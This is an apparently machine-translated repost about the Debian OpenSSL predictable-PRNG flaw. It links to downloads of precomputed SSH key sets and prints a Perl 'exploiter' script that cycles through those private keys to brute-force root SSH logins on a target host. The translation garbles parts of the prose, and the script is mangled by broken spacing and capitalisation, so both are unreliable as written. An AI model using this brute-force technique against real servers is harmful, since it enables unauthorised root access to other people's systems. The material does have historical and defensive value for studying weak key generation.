DebianOpenSSL predictable brute-force cracking SSH analysis of PRNG

DebianOpenSSL predictable brute-force cracking SSH analysis of PRNG-Linux Enterprise Application-Linux server application information. The following is a detailed description. Unlocking the ssh key In Debian OpenSSL is only 65.536 possible, and the only entropy is the Pid that causes the key process.

This allows the following perl script program to use a pre-computed ssh key with brute force. If the key is installed and configured in a non-patched debian or other system guide, it will operate.

Debian is not required in an unpatched system. do the following:

Keys provided by HD mol-http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
Http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract the corresponding directory

3. Enter/root/. ssh/authorized_keys and the 2048-bit ssh rsa key, causing the eak in Upatched Debian (this is the key that will increase the ratio of the disk to the eak)

4. Run the perl script and extract the bzip2 location for it.

CODE :#! /Usr/bin/perl My $ keysPerConnect = 6; Unless ($ ARGV [1]) { Print "Syntax:./exploiter. pl pathToSSHPrivateKeys SSHhostToTry \ n "; Print "Example:./exploiter. pl/root/keys/127.0.0.1 \ n "; Print "By hack01 [at] live [dot] cn \ n "; Exit 0; } Chdir ($ ARGV [0]); Opendir (A, $ ARGV [0]) | die ("opendir "); While ($ _ = readdir ()){ Chomp; Next unless m, ^ \ d + $ ,; Push (@ a, $ _); If (scalar (@ a)> $ keysPerConnect ){ System ("echo ". join ("", @ ). "; ssh-l root ". join ("", map {"-I ". $ _} @ ). "". $ ARGV [1]); @ A = (); } }